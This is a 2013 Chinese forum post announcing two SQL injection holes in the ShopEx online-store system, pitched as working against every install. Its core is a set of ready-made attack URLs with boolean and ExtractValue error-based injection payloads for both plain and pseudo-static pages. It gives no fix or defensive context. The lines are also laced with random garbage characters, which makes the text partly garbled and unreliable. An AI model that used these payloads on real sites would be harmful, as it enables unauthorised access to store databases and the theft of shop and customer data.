找回密码
 立即注册
查看: 2437|回复: 0
打印 上一主题 下一主题

shopex通杀注入0day漏洞两处

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-19 08:31:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… # K2 e7 u9 k+ O/ C7 _9 m# I6 g3 ~
/ [9 C) d  I' ]7 v0 }
好吧,我扯远了~~4 e. ^6 A3 v* |6 j, J3 N+ O# S- g
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
& [/ J+ n) t2 X2 `4 _! s不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
. }5 B' M6 }! H  Y; J& @  d; i! I8 D4 R2 L* Z4 @# s
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html   I5 e( t+ K" P/ ~% H' r
0 A7 }. z7 l8 L. o! E' s/ @. V
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html 7 Z2 l6 }) ^" u1 P& R0 i  j  X

5 C% C9 t* K& r& j& h- Shttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
5 f. v" Q4 e8 x4 y9 K2 l
2 x8 N/ m, @. I5 q" j3 f; ]http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html ; C$ `. o0 l3 L6 z% }
% s7 T; ^5 _: R9 h" t

' H7 U: |$ v4 s8 f2 f- {2 b. Q一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
' `* x2 |- e$ Q8 Z( z如何注入就不多说了,10多年的东西了…不会也会了… ) h# \2 E+ q; Z9 Q5 i' J

- r  C5 j7 r3 F9 P0 c, f" k$ S. ^

- r2 O/ m+ S( ^& I  K$ K+ [7 @6 T9 C' b$ b
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表